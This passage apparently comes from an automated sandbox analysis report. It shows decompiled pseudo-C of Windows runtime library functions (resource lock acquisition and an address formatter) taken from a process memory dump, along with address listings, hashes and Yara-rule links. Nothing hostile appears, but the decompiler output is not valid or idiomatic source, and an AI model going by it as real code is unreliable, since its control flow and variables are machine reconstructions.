				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021001c0;
									_push(_t144);
									_push(0);
									_t51 = E0201F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02064FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02073F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02073F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E020A217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02073F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02063915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021001c0;
												_push(_t138);
												_push(0);
												_t58 = E0201F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02064FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02073F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02073F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E020A217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02073F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02063915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02045384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0201F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02063915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0201F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02063915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0201F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02063915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02045329(_t110, _t138);
																_t69 = E020453A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                                                                                                    0x0206055a
                                                                                                                                                    0x0206055d
                                                                                                                                                    0x02060563
                                                                                                                                                    0x02060566
                                                                                                                                                    0x020605d8
                                                                                                                                                    0x020605e2
                                                                                                                                                    0x020605e5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020605e7
                                                                                                                                                    0x020605e7
                                                                                                                                                    0x020605ea
                                                                                                                                                    0x020605f3
                                                                                                                                                    0x020605f3
                                                                                                                                                    0x02060568
                                                                                                                                                    0x02060568
                                                                                                                                                    0x02060568
                                                                                                                                                    0x02060569
                                                                                                                                                    0x02060569
                                                                                                                                                    0x02060569
                                                                                                                                                    0x0206056b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208217f
                                                                                                                                                    0x02082183
                                                                                                                                                    0x0208225b
                                                                                                                                                    0x0208225f
                                                                                                                                                    0x02082189
                                                                                                                                                    0x0208218c
                                                                                                                                                    0x0208218f
                                                                                                                                                    0x02082194
                                                                                                                                                    0x02082199
                                                                                                                                                    0x0208219d
                                                                                                                                                    0x020821a0
                                                                                                                                                    0x020821a2
                                                                                                                                                    0x020821ce
                                                                                                                                                    0x020821ce
                                                                                                                                                    0x020821ce
                                                                                                                                                    0x020821d0
                                                                                                                                                    0x020821d6
                                                                                                                                                    0x020821de
                                                                                                                                                    0x020821e2
                                                                                                                                                    0x020821e8
                                                                                                                                                    0x020821e9
                                                                                                                                                    0x020821ec
                                                                                                                                                    0x020821f1
                                                                                                                                                    0x020821f6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020821f8
                                                                                                                                                    0x020821fb
                                                                                                                                                    0x02082206
                                                                                                                                                    0x0208220b
                                                                                                                                                    0x0208220c
                                                                                                                                                    0x02082217
                                                                                                                                                    0x02082226
                                                                                                                                                    0x0208222b
                                                                                                                                                    0x0208222c
                                                                                                                                                    0x0208222f
                                                                                                                                                    0x02082232
                                                                                                                                                    0x02082235
                                                                                                                                                    0x02082235
                                                                                                                                                    0x0208223a
                                                                                                                                                    0x0208223f
                                                                                                                                                    0x02082241
                                                                                                                                                    0x02082243
                                                                                                                                                    0x02082248
                                                                                                                                                    0x02082248
                                                                                                                                                    0x0208224d
                                                                                                                                                    0x0208224f
                                                                                                                                                    0x02082262
                                                                                                                                                    0x02082263
                                                                                                                                                    0x02082268
                                                                                                                                                    0x02082269
                                                                                                                                                    0x02082269
                                                                                                                                                    0x02082269
                                                                                                                                                    0x0208226d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082276
                                                                                                                                                    0x02082279
                                                                                                                                                    0x0208227e
                                                                                                                                                    0x02082283
                                                                                                                                                    0x02082287
                                                                                                                                                    0x0208228a
                                                                                                                                                    0x0208228d
                                                                                                                                                    0x0208228f
                                                                                                                                                    0x020822bc
                                                                                                                                                    0x020822bc
                                                                                                                                                    0x020822bc
                                                                                                                                                    0x020822be
                                                                                                                                                    0x020822c4
                                                                                                                                                    0x020822cc
                                                                                                                                                    0x020822d0
                                                                                                                                                    0x020822d6
                                                                                                                                                    0x020822d7
                                                                                                                                                    0x020822da
                                                                                                                                                    0x020822df
                                                                                                                                                    0x020822e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822e6
                                                                                                                                                    0x020822e9
                                                                                                                                                    0x020822f4
                                                                                                                                                    0x020822f9
                                                                                                                                                    0x020822fa
                                                                                                                                                    0x02082305
                                                                                                                                                    0x02082314
                                                                                                                                                    0x02082319
                                                                                                                                                    0x0208231a
                                                                                                                                                    0x0208231d
                                                                                                                                                    0x02082320
                                                                                                                                                    0x02082323
                                                                                                                                                    0x02082323
                                                                                                                                                    0x02082328
                                                                                                                                                    0x0208232d
                                                                                                                                                    0x0208232f
                                                                                                                                                    0x02082331
                                                                                                                                                    0x02082336
                                                                                                                                                    0x02082336
                                                                                                                                                    0x0208233b
                                                                                                                                                    0x0208233d
                                                                                                                                                    0x02082350
                                                                                                                                                    0x02082351
                                                                                                                                                    0x02082356
                                                                                                                                                    0x02082359
                                                                                                                                                    0x02082359
                                                                                                                                                    0x0208235b
                                                                                                                                                    0x0208235d
                                                                                                                                                    0x02045367
                                                                                                                                                    0x0204536b
                                                                                                                                                    0x02045372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082363
                                                                                                                                                    0x02082363
                                                                                                                                                    0x02082369
                                                                                                                                                    0x0208236a
                                                                                                                                                    0x0208236c
                                                                                                                                                    0x02082371
                                                                                                                                                    0x02082373
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082379
                                                                                                                                                    0x02082379
                                                                                                                                                    0x0208237a
                                                                                                                                                    0x0208237f
                                                                                                                                                    0x0208237f
                                                                                                                                                    0x02082385
                                                                                                                                                    0x02082386
                                                                                                                                                    0x02082389
                                                                                                                                                    0x0208238e
                                                                                                                                                    0x02082390
                                                                                                                                                    0x02045378
                                                                                                                                                    0x0204537c
                                                                                                                                                    0x02082396
                                                                                                                                                    0x02082396
                                                                                                                                                    0x02082397
                                                                                                                                                    0x0208239c
                                                                                                                                                    0x020823a2
                                                                                                                                                    0x020823a3
                                                                                                                                                    0x020823a6
                                                                                                                                                    0x020823ab
                                                                                                                                                    0x020823ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020823b3
                                                                                                                                                    0x020823b3
                                                                                                                                                    0x020823b4
                                                                                                                                                    0x020823b9
                                                                                                                                                    0x020823ba
                                                                                                                                                    0x020823ba
                                                                                                                                                    0x020823bc
                                                                                                                                                    0x020823bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02079153
                                                                                                                                                    0x02079158
                                                                                                                                                    0x0207915a
                                                                                                                                                    0x0207915e
                                                                                                                                                    0x02079160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02079166
                                                                                                                                                    0x02079166
                                                                                                                                                    0x02079171
                                                                                                                                                    0x02079176
                                                                                                                                                    0x02079176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02079160
                                                                                                                                                    0x020823c6
                                                                                                                                                    0x020823ce
                                                                                                                                                    0x020823d7
                                                                                                                                                    0x020823d7
                                                                                                                                                    0x020823ad
                                                                                                                                                    0x02082390
                                                                                                                                                    0x02082373
                                                                                                                                                    0x0208233f
                                                                                                                                                    0x0208233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208233f
                                                                                                                                                    0x02082291
                                                                                                                                                    0x02082291
                                                                                                                                                    0x02082293
                                                                                                                                                    0x02082295
                                                                                                                                                    0x0208229a
                                                                                                                                                    0x020822a1
                                                                                                                                                    0x020822a3
                                                                                                                                                    0x020822a7
                                                                                                                                                    0x020822a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822ab
                                                                                                                                                    0x020822ad
                                                                                                                                                    0x020822af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822af
                                                                                                                                                    0x020822b1
                                                                                                                                                    0x020822b4
                                                                                                                                                    0x020822b4
                                                                                                                                                    0x020822b6
                                                                                                                                                    0x020453be
                                                                                                                                                    0x020453be
                                                                                                                                                    0x020453be
                                                                                                                                                    0x020453c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020453cb
                                                                                                                                                    0x020453ce
                                                                                                                                                    0x020453d0
                                                                                                                                                    0x020453d4
                                                                                                                                                    0x020453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020453d8
                                                                                                                                                    0x020453e3
                                                                                                                                                    0x020453ea
                                                                                                                                                    0x020453ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020453d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020822b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208228f
                                                                                                                                                    0x02082349
                                                                                                                                                    0x0208234d
                                                                                                                                                    0x02082251
                                                                                                                                                    0x02082251
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082251
                                                                                                                                                    0x020821a4
                                                                                                                                                    0x020821a4
                                                                                                                                                    0x020821a6
                                                                                                                                                    0x020821a8
                                                                                                                                                    0x020821ac
                                                                                                                                                    0x020821b6
                                                                                                                                                    0x020821b8
                                                                                                                                                    0x020821bc
                                                                                                                                                    0x020821be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020821c0
                                                                                                                                                    0x020821c2
                                                                                                                                                    0x020821c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020821c4
                                                                                                                                                    0x020821c6
                                                                                                                                                    0x020821c6
                                                                                                                                                    0x020821c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x020821c8
                                                                                                                                                    0x020821a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02082183
                                                                                                                                                    0x0206057b
                                                                                                                                                    0x0206057d
                                                                                                                                                    0x02060581
                                                                                                                                                    0x02060583
                                                                                                                                                    0x02082178
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02060589
                                                                                                                                                    0x0206058f
                                                                                                                                                    0x0206058f
                                                                                                                                                    0x02060583
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02082206
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                    • Opcode ID: b8a68985525e3e637d3f6474480a5cb03779208ecbcc944daeeb76650dd8a17b
                                                                                                                                                    • Instruction ID: 2a0601e39646d3b9256b4a692860b0c56b436c9e9d99be995b1f4844cd9923b0
                                                                                                                                                    • Opcode Fuzzy Hash: b8a68985525e3e637d3f6474480a5cb03779208ecbcc944daeeb76650dd8a17b
                                                                                                                                                    • Instruction Fuzzy Hash: 2A5137717403556FEB15DA18CCC1FA733EAAB98720F218269EC85DF284DA71EC41AB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 020614C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E020614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2102088; // 0x764d65b9
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02057707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E020613CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02057707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02057707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02022340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0202E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                    0x020614c0
                                                                                                                                                    0x020614cb
                                                                                                                                                    0x020614d2
                                                                                                                                                    0x020614d6
                                                                                                                                                    0x020614da
                                                                                                                                                    0x020614de
                                                                                                                                                    0x020614e3
                                                                                                                                                    0x0206157a
                                                                                                                                                    0x0206157a
                                                                                                                                                    0x020614f1
                                                                                                                                                    0x020614f3
                                                                                                                                                    0x0208ea0f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ea15
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0208ea15
                                                                                                                                                    0x020614f9
                                                                                                                                                    0x020614f9
                                                                                                                                                    0x020614fe
                                                                                                                                                    0x02061504
                                                                                                                                                    0x0208ea1a
                                                                                                                                                    0x0208ea1f
                                                                                                                                                    0x0208ea21
                                                                                                                                                    0x0208ea22
                                                                                                                                                    0x0208ea27
                                                                                                                                                    0x0208ea2a
                                                                                                                                                    0x0208ea2a
                                                                                                                                                    0x02061515
                                                                                                                                                    0x02061517
                                                                                                                                                    0x0206156d
                                                                                                                                                    0x02061572
                                                                                                                                                    0x02061575
                                                                                                                                                    0x02061575
                                                                                                                                                    0x0206151e
                                                                                                                                                    0x0208ea50
                                                                                                                                                    0x0208ea55
                                                                                                                                                    0x0208ea58
                                                                                                                                                    0x0208ea58
                                                                                                                                                    0x0206152e
                                                                                                                                                    0x02061531
                                                                                                                                                    0x02061533
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02061535
                                                                                                                                                    0x02061541
                                                                                                                                                    0x02061549
                                                                                                                                                    0x02061549
                                                                                                                                                    0x02061533
                                                                                                                                                    0x020614f3
                                                                                                                                                    0x02061559

                                                                                                                                                    APIs
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0208EA22
                                                                                                                                                      • Part of subcall function 020613CB: ___swprintf_l.LIBCMT ref: 0206146B
                                                                                                                                                      • Part of subcall function 020613CB: ___swprintf_l.LIBCMT ref: 02061490
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0206156D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000009.00000002.2373658068.0000000002010000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
                                                                                                                                                    • Associated: 00000009.00000002.2373633873.0000000002000000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373756290.00000000020F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373764469.0000000002100000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373771769.0000000002104000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373777628.0000000002107000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373784031.0000000002110000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000009.00000002.2373840976.0000000002170000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                    • Opcode ID: a7aac4bb93b92ff5bd5acae55844956d4b8c7a5b1162e331e1d1d9c812895bc4
                                                                                                                                                    • Instruction ID: 1636fb5f67b6708f606095eb4cbb9db3f3abce308d353f2370c0ba24bd7cbfa9
                                                                                                                                                    • Opcode Fuzzy Hash: a7aac4bb93b92ff5bd5acae55844956d4b8c7a5b1162e331e1d1d9c812895bc4
                                                                                                                                                    • Instruction Fuzzy Hash: 0D21B172900329DBDB21EE54DC48AFFF3ADAB10704F444056EC4AD3240DB70EA58ABE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 020453A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                    			E020453A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x021001c0;
									_push(_t92);
									_push(0);
									_t37 = E0201F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02064FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02073F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02073F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E020A217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02073F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02063915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02045384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0201F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02063915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0201F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02063915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0201F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02063915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02045329(_t74, _t92);
													_push(1);
													_t48 = E020453A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
